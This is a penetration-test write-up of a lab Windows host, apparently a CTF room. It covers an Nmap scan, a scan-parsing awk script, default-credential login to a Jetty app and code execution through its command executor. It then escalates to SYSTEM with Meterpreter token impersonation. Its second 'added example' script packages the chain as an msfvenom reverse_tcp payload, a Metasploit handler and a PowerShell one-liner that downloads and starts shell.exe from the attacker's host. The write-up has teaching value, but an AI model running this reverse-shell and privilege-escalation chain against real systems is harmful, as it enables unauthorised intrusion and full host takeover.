Phases of penetration testing activities include the following:
Planning – customer goals are gathered and the rules of engagement are agreed.
Discovery – scan and enumerate to identify potential vulnerabilities, weak areas and candidate exploits.
Attack – confirm potential vulnerabilities by exploiting them, then repeat discovery from whatever new access was gained.
Reporting – document every vulnerability and exploit found, the failed attempts, and the organisation's strengths and weaknesses.
Scope

Assessment | Details |
---|---|
Internal & external penetration test | 10.10.226.224 (single host, the target of the Nmap scan below) |
Vulnerability Summary

Finding | Severity |
---|---|
Default credentials (admin:admin) on the web application on port 8080 | High |
Remote code execution through the application's command executor on port 8080 | High |
Token impersonation from the obtained shell to BUILTIN\Administrators / SYSTEM | High |
Starting the engagement with an Nmap scan. The flags: -A enables version detection, default scripts, OS detection and traceroute; -T4 is aggressive timing; --open lists only open ports; -vv is extra verbose; -oN nmap writes the normal-format output to a file named nmap; -Pn skips host discovery, since Windows hosts often drop the ping probes and would otherwise be reported as down.

```text
sudo nmap -A -T4 --open -vv 10.10.226.224 -oN nmap -Pn
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
3389/tcp open tcpwrapped syn-ack ttl 127
| ssl-cert: Subject: commonName=alfred
| Issuer: commonName=alfred
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-08-11T16:26:23
| Not valid after: 2023-02-10T16:26:23
| MD5: 3038 e053 8bfa 8e35 d8d8 ae42 4a7b c5fc
| SHA-1: c0e0 bea1 b805 d325 2efa 1e3f aa32 23eb 986f 7f57
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIQF06qDRJBJ41Cqf7rqpG8kDANBgkqhkiG9w0BAQUFADAR
| MQ8wDQYDVQQDEwZhbGZyZWQwHhcNMjIwODExMTYyNjIzWhcNMjMwMjEwMTYyNjIz
| WjARMQ8wDQYDVQQDEwZhbGZyZWQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
| AoIBAQDdxRnRn3a5UAn/E89zRhYTH1GyokrqQCp6NgpYYgaa6Y1YCcZnrLGLDEJw
| eXhYOgT1Q/O33soDyDeH9f+Jcp3awG0cG4YGnVh2FEiRwNnwYIVkqJVI0SqtuLYH
| /BKZwU+6LT24xJ8BtFSaORzeQBc3gyfwWkx2RUlGx27VPxqEoLrVKYraw6hyqCE3
| WIJUlMKE7OFpEYPvl1+dRJsCCQki6ZqJrb1uqVNljeFEDc+kZo5kWqd0gnO8jt1I
| dA41BMe4EtIAKmYZGG8IulAotWDhTdXOfSarhoHPVvWTPTXD5uTo0RAcN6sterGO
| WvheMnEL9fm4yGdLUfv8U25U81HvAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUF
| BwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQUFAAOCAQEAjjJfpfDBizHwIIDh
| NzHqn1Dz44bnuCkuxdfZ+u3WrqQ0XuflgTMhgbqN8OZZPuXzZHQNdbnYieQimXVw
| kRAR/JbqTC+8s+cYBRytpu/ZSO1f61yz2fiySSxjr/bkrQY/SVr7fpR57BQl6bh9
| Y+lx4ms3p45YcQnuOIPKvIvPw60potiGHWmnT17XWcrA44TFdgB0NITnx7xVNRk2
| AaA/GyIjsbkt/s9fs3kqN8OK3HhkdC3FxPZzRpkW6AsxBwTc5CgeQg7if4CafRSA
| j+G8IXwBpRY5SyTz6YJeSKxEjrF1I9u9RtnnGxOHujkexmOf73s6RTRVP/4ENUT4
| NS4Czg==
|_-----END CERTIFICATE-----
|_ssl-date: 2022-08-12T16:34:20+00:00; 0s from scanner time.
8080/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
```
Three open ports were found: 80/tcp (Microsoft IIS 7.5), 3389/tcp (RDP; its TLS certificate is self-signed for commonName=alfred and signed with SHA-1) and 8080/tcp (Jetty 9.4.z-SNAPSHOT, with a robots.txt that disallows everything). HTTP TRACE is enabled on port 80; that is informational only, but it belongs in the report.
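The scan output is easier to report from once it is reduced to a port table plus the details worth a line in the findings. The script below is an added example, not part of the original write-up: it parses Nmap's normal (-oN) output with awk, lists the open ports, flags the risky TRACE method and the self-signed, SHA-1-signed RDP certificate, and checks whether that certificate is still valid at a given time. Its input is the scan output quoted above with the PEM body removed; the function names (open_ports, risky_findings, cert_expired) are my own.

```shell
#!/bin/sh
# Added example, not part of the original write-up: reduce Nmap "-oN" output
# to a port table and the observations worth reporting. sample_output() is
# the scan output quoted above with the PEM certificate body removed, so the
# script runs offline; the function names are my own.
set -eu

sample_output() {
  cat <<'EOF'
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
3389/tcp open tcpwrapped syn-ack ttl 127
| ssl-cert: Subject: commonName=alfred
| Issuer: commonName=alfred
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-08-11T16:26:23
| Not valid after: 2023-02-10T16:26:23
|_ssl-date: 2022-08-12T16:34:20+00:00; 0s from scanner time.
8080/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
EOF
}

# One line per open port: "port/proto service [product]".
# Port lines look like: 80/tcp open http syn-ack ttl 127 <product...>
open_ports() {
  sample_output | awk '
    $2 == "open" {
      prod = ""
      for (i = 7; i <= NF; i++) prod = prod (i > 7 ? " " : "") $i
      if (prod == "") print $1, $3; else print $1, $3, prod
    }'
}

port_count() { open_ports | awk 'END { print NR }'; }

# Observations worth a line in the report, attributed to their port.
risky_findings() {
  sample_output | awk '
    /^[0-9]+\/(tcp|udp) +open/ { port = $1 }
    /Potentially risky methods:/ { sub(/.*methods: */, ""); print port ": risky HTTP method(s) " $0 }
    /ssl-cert: Subject:/ { subj = $0; sub(/.*Subject: */, "", subj) }
    /^\| Issuer:/ { iss = $0; sub(/.*Issuer: */, "", iss)
                    if (iss == subj) print port ": self-signed certificate (" subj ")" }
    /Signature Algorithm: sha1/ { print port ": certificate signed with SHA-1" }'
}

# "Not valid after" timestamp of the certificate in the output.
cert_not_after() {
  sample_output | awk '/Not valid after:/ { print $NF; exit }'
}

# Exit status 0 if the certificate had expired at the given ISO-8601 time.
# Timestamps in the same zone and format compare correctly as strings.
cert_expired() {
  awk -v a="$(cert_not_after)" -v n="$1" 'BEGIN { if (a < n) exit 0; exit 1 }'
}

printf 'Open ports: %s\n' "$(port_count)"
open_ports
printf 'Findings:\n'
risky_findings
if cert_expired "$(date -u +%Y-%m-%dT%H:%M:%S)"; then
  printf '3389/tcp: certificate expired on %s\n' "$(cert_not_after)"
fi
```

The certificate was valid when the scan ran (ssl-date 2022-08-12) but expired on 2023-02-10, so a report reviewed months later would state something different from the scan; cert_expired makes that check explicit instead of leaving it to whoever reads the output.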
Port 80 → HTTP. Browsing the IIS site turned up nothing interesting, so we move on.
Port 8080 → HTTP. The application on 8080 presents a login form. Trying the default credentials admin:admin gets us in.
Looking around the application, there is a feature that executes commands on the host (a command executor). That is our route to code execution.
First, set up a listener with Metasploit (exploit/multi/handler, with the payload matching the one in the command we are about to run).
Then paste the PowerShell command into the command executor and run it.
We get a reverse shell. In msfconsole, `sessions` lists the sessions and `sessions -i <id>` interacts with one.
Now use token impersonation to gain SYSTEM access from the Meterpreter session:
- `load incognito`
- `list_tokens -g` (lists the group tokens available to this process; if BUILTIN\Administrators is not among them, the account the service runs as cannot impersonate it and another route is needed)
- `impersonate_token "BUILTIN\Administrators"`
Confirm with `getuid`. If protected files still cannot be read afterwards, migrate into a process that already runs as NT AUTHORITY\SYSTEM (find services.exe with `ps`, then `migrate <pid>`): some access checks are made against the process's primary token rather than the impersonated one, and migrating gives the session a SYSTEM primary token.
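The steps above (handler, PowerShell command pasted into the command executor, session interaction, incognito) wired into one repeatable attacker-side script. This is an added example, not the author's commands: the payload (windows/meterpreter/reverse_tcp), the file and path names, the default LHOST/LPORT/HTTP_PORT values and the PowerShell download cradle are assumptions chosen for illustration; the write-up does not say which PowerShell command was used.

```shell
#!/bin/sh
# Added example (not from the original write-up): attacker-side workflow for
# the listener / PowerShell stager / incognito steps. Payload choice, file
# names, paths and the default addresses below are assumptions.
set -eu

LHOST="${LHOST:-10.9.0.1}"      # attacker IP (assumed; override in the environment)
LPORT="${LPORT:-4444}"          # handler port (assumed)
HTTP_PORT="${HTTP_PORT:-8000}"  # port the payload is served from (assumed)
PAYLOAD="windows/meterpreter/reverse_tcp"  # 32-bit staged payload, runs on either arch

# msfconsole resource script: a backgrounded handler that stays up, so a
# second callback (for example after a migrate) is still caught.
handler_rc() {
  cat <<EOF
use exploit/multi/handler
set payload $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j -z
EOF
}

# msfvenom command that builds the executable the target will download.
venom_cmd() {
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o shell.exe\n' "$PAYLOAD" "$LHOST" "$LPORT"
}

# PowerShell one-liner to paste into the target's command executor: fetch the
# executable from our HTTP server and start it. Target path is an assumption.
stager_cmd() {
  cat <<EOF
powershell -c "(New-Object Net.WebClient).DownloadFile('http://$LHOST:$HTTP_PORT/shell.exe','C:\Windows\Temp\shell.exe'); Start-Process 'C:\Windows\Temp\shell.exe'"
EOF
}

# Meterpreter commands for the open session: impersonate the Administrators
# token, verify, then migrate into a SYSTEM process so the session runs on a
# SYSTEM primary token rather than an impersonated thread token.
post_cmds() {
  cat <<'EOF'
getuid
load incognito
list_tokens -g
impersonate_token "BUILTIN\Administrators"
getuid
ps
migrate <pid>      (PID of services.exe from the ps listing)
EOF
}

if [ "${1:-}" = "--run" ]; then
  handler_rc > handler.rc
  printf '[*] build the payload:   %s\n' "$(venom_cmd)"
  printf '[*] serve it:            python3 -m http.server %s\n' "$HTTP_PORT"
  printf '[*] start the handler:   msfconsole -q -r handler.rc\n'
  printf '[*] paste into the command executor:\n%s\n' "$(stager_cmd)"
  printf '[*] then, in the Meterpreter session:\n'
  post_cmds
fi
```

Run it with --run to write handler.rc and print the commands in the order they are used; without --run it only defines the functions. Keep ExitOnSession false: if the first session dies during migration you still have a listener for the next callback.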
If the flag is not in its default location and nothing hints at where it is, use Meterpreter's search command to look for it on the file system, e.g. `search -f flag*.txt`, optionally with `-d C:\` to set the directory the search starts from.